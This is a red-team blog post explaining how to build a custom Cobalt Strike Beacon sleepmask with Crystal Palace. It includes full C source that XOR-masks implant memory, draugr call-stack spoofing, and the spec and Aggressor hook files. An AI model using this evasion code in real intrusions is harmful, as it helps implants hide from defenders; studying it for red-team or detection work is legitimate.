09 Apr 2026 8 min read

Crystal Mask

The goal of Crystal Palace (and the Tradecraft Garden) is to separate evasion tradecraft from the capability. This means that a capability (such as a DLL) has no evasion built into it, and that evasion is woven in at link-time in a manner that the capability is not aware of (nor designed to accommodate). The primary advantage of this philosophy is that you can swap different tradecraft in and out without having to rebuild the entire capability.

Cobalt Strike's post-exploitation agent, Beacon, is designed for users to leverage their own evasion tradecraft, but it does so in a fundamentally different way. Beacon's sleepmask is a BOF, which Beacon explicitly calls into when it wants to execute a Win32 API that's supported by BeaconGate. This is therefore evasion that Beacon is aware of and accommodates.

Crystal Kit was my experiment to disable Beacon's built-in customisation options and apply evasion tradecraft via Crystal Palace's hooking primitive.

This works by hooking Beacon's IAT and redirecting API calls to functions within a memory-loaded PICO. These hook functions are where evasion tradecraft, like call stack spoofing, are implemented.

Having had time and experience working with the codebase, I've started to get a good feel for some of the upsides and downsides of this approach. Without a doubt, the biggest upside is the freedom and flexibility that it provides. For instance, we can force APIs that are not supported by BeaconGate, such as CreateProcess, through evasion tradecraft because we're not constrained by what the capability (Beacon) can provide.

On the flip side, one of the downsides is the amount of extra work you have to do as a developer. This became apparent to me when implementing memory obfuscations on sleep. One of the requirements of memory obfuscation is knowing the address and size of each memory allocation that you want to mask. For a capability such as Beacon, this can be solved by passing information about memory allocations from the reflective loader. For dynamic allocations made at runtime (such as heap memory), you can hook HeapAlloc, HeapReAlloc, and HeapFree, and manually keep track of every allocation that's created, resized, and freed.
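To give a feel for the bookkeeping involved, here is a minimal sketch of an allocation table that HeapAlloc, HeapReAlloc, and HeapFree hooks could update. Everything in it (the `alloc_table` type, the `track_*` function names, the fixed capacity) is hypothetical and only illustrates the idea; it is not how Crystal Kit or Beacon tracks memory, and it leaves out the hooks themselves and any thread safety.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_TRACKED 64 /* hypothetical fixed capacity for the sketch */

/* One tracked allocation: where it lives and how big it is. */
typedef struct {
    void  *ptr;
    size_t size;
} tracked_alloc;

/* Must be zero-initialised before use; a NULL ptr marks a free slot. */
typedef struct {
    tracked_alloc records[MAX_TRACKED];
} alloc_table;

/* Find the slot holding ptr. Passing NULL finds the first free slot. */
static tracked_alloc *find_slot(alloc_table *table, void *ptr)
{
    assert(table != NULL);
    for (size_t i = 0; i < MAX_TRACKED; i++) {
        if (table->records[i].ptr == ptr) {
            return &table->records[i];
        }
    }
    return NULL;
}

/* Call from a HeapAlloc hook once the real allocation has succeeded. */
int track_alloc(alloc_table *table, void *ptr, size_t size)
{
    if (ptr == NULL) return 0;
    tracked_alloc *slot = find_slot(table, NULL);
    if (slot == NULL) return 0; /* table is full */
    slot->ptr  = ptr;
    slot->size = size;
    return 1;
}

/* Call from a HeapReAlloc hook: the block may have moved and changed size. */
int track_realloc(alloc_table *table, void *old_ptr, void *new_ptr, size_t new_size)
{
    if (old_ptr == NULL || new_ptr == NULL) return 0;
    tracked_alloc *slot = find_slot(table, old_ptr);
    if (slot == NULL) return 0; /* we never saw this allocation */
    slot->ptr  = new_ptr;
    slot->size = new_size;
    return 1;
}

/* Call from a HeapFree hook so freed memory is never masked. */
int track_free(alloc_table *table, void *ptr)
{
    if (ptr == NULL) return 0;
    tracked_alloc *slot = find_slot(table, ptr);
    if (slot == NULL) return 0;
    slot->ptr  = NULL;
    slot->size = 0;
    return 1;
}

/* Total number of bytes a masking pass would need to cover. */
size_t tracked_bytes(const alloc_table *table)
{
    size_t total = 0;
    for (size_t i = 0; i < MAX_TRACKED; i++) {
        if (table->records[i].ptr != NULL) {
            total += table->records[i].size;
        }
    }
    return total;
}
```

Even in this stripped-down form, every allocation path needs its own handling, which is the extra developer work described above.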

However, Beacon already has several software 'contracts' with the reflective loader and the sleepmask that make this process a whole lot easier. Beacon's default reflective loader passes information to Beacon (via BUD) about the memory that Beacon is loaded into. When Beacon calls into the sleepmask, it does so with the following function:

void sleep_mask ( PBEACON_INFO beacon_info, PFUNCTION_CALL function_call );

FUNCTION_CALL is a structure that contains information about what Win32 API Beacon wants to call. This could be Sleep (for standard HTTP/DNS Beacons), or another API supported by BeaconGate (such as OpenProcess).

BEACON_INFO is a structure that contains information about Beacon's memory allocations. This includes memory that Beacon is loaded into (provided by the reflective loader via BUD); and heap memory that Beacon has allocated for itself. That is to say, Beacon tracks its heap memory for you. There are also a few BOF APIs like BeaconGetSyscallInformation and BeaconGetCustomUserData, which support you in doing custom things in collaboration with the reflective loader.

This is pretty nice for scenarios where you may want a custom sleepmask but with the default loader - as you can just consume the information that's already available. Likewise, you could use the default sleepmask and a custom loader; or of course, completely custom loaders and sleepmasks (even made by different people). As long as these contracts are properly observed, these components will play nicely with each other.

Basic Mask

Since the sleepmask is just a BOF (i.e. a COFF with exposure to Beacon-specific APIs), a question that came to my mind was: can we merge and weave custom evasion tradecraft into a COFF (à la BOF Cocktails) and maintain the existing software contract with Beacon? Turns out, the answer is a very easy yes.

We already have access to the relevant header files thanks to the sleepmask-vs project, so we just need to write a minimal implementation to mask memory, make the API call, then unmask memory.

💡

You don't actually have to mask memory at all, it's just my assumption that you'd want to.

This is my basic code in its entirety:

#include <windows.h>
#include "beacon.h"
#include "sleepmask.h"
#include "beacon_gate.h"
#include "tcg.h"

DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect ( LPVOID, SIZE_T, DWORD, PDWORD );

void gate_wrapper ( PFUNCTION_CALL function_call )
{
    ULONG_PTR result = 0;

    switch ( function_call->numOfArgs )
    {
    case 0:
        result = beaconGate ( 00 ) ( );
        break;

    case 1:
        result = beaconGate ( 01 ) ( arg ( 0 ) );
        break;

    case 2:
        result = beaconGate ( 02 ) ( arg ( 0 ), arg ( 1 ) );
        break;

    case 3:
        result = beaconGate ( 03 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ) );
        break;

    case 4:
        result = beaconGate ( 04 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ) );
        break;

    case 5:
        result = beaconGate ( 05 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ) );
        break;

    case 6:
        result = beaconGate ( 06 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ) );
        break;

    case 7:
        result = beaconGate ( 07 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ) );
        break;

    case 8:
        result = beaconGate ( 08 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ) );
        break;

    case 9:
        result = beaconGate ( 09 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ), arg ( 8 ) );
        break;

    case 10:
        result = beaconGate ( 10 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ), arg ( 8 ), arg ( 9 ) );
        break;
    
    default:
        break;
    }

    function_call->retValue = result;
}

void xor ( char * buffer, size_t buffer_len, char * key, size_t key_len )
{
    for ( size_t i = 0; i < buffer_len; i++ )
    {
        buffer [ i ] ^= key [ i % key_len ];
    }
}

BOOL can_write ( DWORD protection )
{
    switch (protection)
    {
    case PAGE_EXECUTE_READWRITE:
    case PAGE_EXECUTE_WRITECOPY:
    case PAGE_READWRITE:
    case PAGE_WRITECOPY:
        return TRUE;
    
    default:
        return FALSE;
    }
}

void mask_section ( PALLOCATED_MEMORY_SECTION section, char * key, BOOL mask )
{
    DWORD old_protection = 0;

    // if we're masking but section not writable
    if ( mask && ! can_write ( section->CurrentProtect ) )
    {
        // make it writable
        if ( KERNEL32$VirtualProtect ( section->BaseAddress, section->VirtualSize, PAGE_READWRITE, &old_protection ) )
        {
            section->CurrentProtect  = PAGE_READWRITE;
            section->PreviousProtect = old_protection;
        }
    }

    if ( can_write ( section->CurrentProtect ) ) {
        // xor the memory
        xor ( section->BaseAddress, section->VirtualSize, key, MASK_SIZE );
    }

    // if we're unmasking and a section's permission has changed
    if ( ! mask && section->CurrentProtect != section->PreviousProtect )
    {
        // set section permissions back to what they were
        if ( KERNEL32$VirtualProtect ( section->BaseAddress, section->VirtualSize, section->PreviousProtect, &old_protection ) )
        {
            section->CurrentProtect  = section->PreviousProtect;
            section->PreviousProtect = old_protection;
        }
    }
}

void mask_regions ( PBEACON_INFO beacon_info, BOOL mask )
{
    size_t region_count = sizeof ( beacon_info->allocatedMemory.AllocatedMemoryRegions ) / sizeof ( ALLOCATED_MEMORY_REGION );
    
    // loop over each region
    for ( size_t i = 0; i < region_count; i++ )
    {
        // take a pointer (not a copy) so protection changes persist between mask and unmask
        ALLOCATED_MEMORY_REGION * region = &beacon_info->allocatedMemory.AllocatedMemoryRegions[i];

        // look for beacon's region
        if ( region->Purpose == PURPOSE_BEACON_MEMORY )
        {
            size_t section_count = sizeof ( region->Sections ) / sizeof ( ALLOCATED_MEMORY_SECTION );
    
            // loop over each beacon section
            for ( size_t j = 0; j < section_count; j++ )
            {
                PALLOCATED_MEMORY_SECTION section = &region->Sections[j];

                if ( section->MaskSection )
                {
                    mask_section ( section, beacon_info->mask, mask );
                }
            }

            break;
        }
    }
}

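void mask_heap ( PBEACON_INFO beacon_info )
{
    int count = 0;

    // check the terminator first so an empty list is never dereferenced;
    // xor is its own inverse, so the same pass both masks and unmasks
    while ( beacon_info->heap_records[count].ptr != NULL )
    {
        xor ( beacon_info->heap_records[count].ptr, beacon_info->heap_records[count].size, beacon_info->mask, MASK_SIZE );
        count++;
    }
}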

void mask_memory ( PBEACON_INFO beacon_info, BOOL mask )
{
    // mask beacon region
    mask_regions ( beacon_info, mask );

    // mask heap memory
    mask_heap ( beacon_info );
}

void go ( PBEACON_INFO beacon_info, PFUNCTION_CALL function_call )
{
    if ( function_call->bMask ) {
        dprintf ( "Masking memory...\n" );
        mask_memory ( beacon_info, TRUE );
    }

    // make the call
    dprintf ( "Calling WinApi #%d\n", function_call->function );
    gate_wrapper ( function_call );

    if ( function_call->bMask ) {
        dprintf ( "Restoring memory...\n" );
        mask_memory ( beacon_info, FALSE );
    }
}

sleepmask.c

💡

You'll notice that there's no evasion tradecraft here because we want to weave that in at link-time (i.e. when a Beacon payload is generated).
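One detail of the listing worth spelling out is that mask_heap takes no mask/unmask flag. That works because XOR with the same key is its own inverse, so a second pass restores the original bytes. The self-contained sketch below demonstrates the round trip outside of Beacon; the `xor_mask` and `xor_roundtrip_ok` names, the sample buffer, and the key bytes are all made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* XOR every byte of buffer with a repeating key. */
void xor_mask(unsigned char *buffer, size_t buffer_len,
              const unsigned char *key, size_t key_len)
{
    assert(key_len > 0); /* avoid a modulo by zero */

    for (size_t i = 0; i < buffer_len; i++) {
        buffer[i] ^= key[i % key_len];
    }
}

/* Returns 1 if one pass changes the data and a second pass restores it. */
int xor_roundtrip_ok(void)
{
    unsigned char data[] = "beacon section bytes";
    unsigned char original[sizeof data];
    const unsigned char key[] = { 0x13, 0x37, 0xC0, 0xDE }; /* arbitrary key */

    memcpy(original, data, sizeof data);

    /* first pass: mask */
    xor_mask(data, sizeof data, key, sizeof key);
    int changed = memcmp(data, original, sizeof data) != 0;

    /* second pass with the same key: unmask */
    xor_mask(data, sizeof data, key, sizeof key);
    int restored = memcmp(data, original, sizeof data) == 0;

    return changed && restored;
}
```

The same property is why the section code only needs the mask flag for its protection handling, not for the XOR itself.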

The specification file to make this work is really small. All we do is load the built object file from disk, run it through the make coff command, merge in the libtcg library, and then export it.

x64:
    load "bin/sleepmask.x64.o"
        make coff +optimize
        mergelib "libtcg.x64.zip"

    export

sleepmask.spec

Then, to hook this into the payload pipeline, we use the BEACON_SLEEP_MASK hook.

import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

# BEACON_SLEEP_MASK HOOK
# $1 = beacon type (default, smb, tcp)
# $2 = arch
set BEACON_SLEEP_MASK
{
   local ( '$path $spec $cap $coff $final' );

   $path = getFileProper ( script_resource ( ), "sleepmask.spec" );
   
   $spec = [ LinkSpec Parse: $path ];
   $cap  = [ Capability None: $2 ];
   $coff = [ $spec run: $cap, [ new HashMap ] ];

   $final = bof_extract ( $coff, "go" );

   return $final;
}

sleepmask.cna

The following screenshot shows this in action.

Evasive Mask

To weave evasion tradecraft over the top of this default sleepmask, build additional source files that implement your techniques (or utilise a shared ZIP library), and integrate them into the spec file. The following is an example of replacing the vanilla function calls with those that go through a draugr call stack spoofing technique.

#include <windows.h>
#include "beacon_gate.h"
#include "spoof.h"

void draugr_gate_wrapper ( PFUNCTION_CALL function_call )
{
    DRAUGR_CALL call = { 0 };

    call.ptr  = function_call->functionPtr;
    call.argc = function_call->numOfArgs;
    
    call.args [ 0 ] = arg ( 0 );
    call.args [ 1 ] = arg ( 1 );
    call.args [ 2 ] = arg ( 2 );
    call.args [ 3 ] = arg ( 3 );
    call.args [ 4 ] = arg ( 4 );
    call.args [ 5 ] = arg ( 5 );
    call.args [ 6 ] = arg ( 6 );
    call.args [ 7 ] = arg ( 7 );
    call.args [ 8 ] = arg ( 8 );
    call.args [ 9 ] = arg ( 9 );

    function_call->retValue = spoof_call ( &call );
}

draugr_gate.c

In the spec file, I've just created a new label called .draugr and hardcoded it into the main x64 block. However, you can modify this to suit your needs better. You could pass the desired technique in as a variable (from the Aggressor script), which you could even set through the Cobalt Strike UI (similar to how sleepmask-vs does it).

x64:
    load "bin/sleepmask.x64.o"
        make coff +optimize

    # weave my evasion
    .draugr
    
    mergelib "libtcg.x64.zip"
    export

draugr.x64:
    # merge the call stack spoofing
    load "bin/spoof.x64.o"
        merge

    # merge the asm stub
    load "bin/draugr.x64.bin"
        linkfunc "draugr_stub"

    # merge the new wrapper
    load "bin/draugr_wrapper.x64.o"
        merge

    # redirect call sites
    redirect "gate_wrapper" "draugr_gate_wrapper"

These additional steps merge the evasion tradecraft into the COFF and then replace calls to the default gate_wrapper function with calls to my new draugr_gate_wrapper one.

💡

The +optimize option in the spec file ensures that any unreferenced code (gate_wrapper in this case) is omitted from the final COFF.

The following screenshot demonstrates this sleepmask in action:

Other Crystal Palace primitives, such as ised, will work here too. See Islands of Invariance for more info on that.

Conclusion

This post has described two approaches for evasion - one where the capability has no knowledge and one where it does. Both have their pros and cons. The 'no knowledge' approach is good for flexibility, and may even be your only option depending on the capability. But the 'has knowledge' approach also has its benefits, particularly when it comes to ease-of-use and compatibility between components.

Crystal Kit's sleepmask PICO is tightly coupled to its own reflective loader. You cannot mix and match Crystal Kit's sleepmask with another loader; nor its loader with another sleepmask. Whether or not that's a good thing may be down to individual opinion. I think it would be better, overall, if you could mix and match.

However, exporting a merged COFF from Crystal Palace doesn't solve limitations in places like BeaconGate, so I guess the important thing is that we have options and can decide on the best approach for our needs.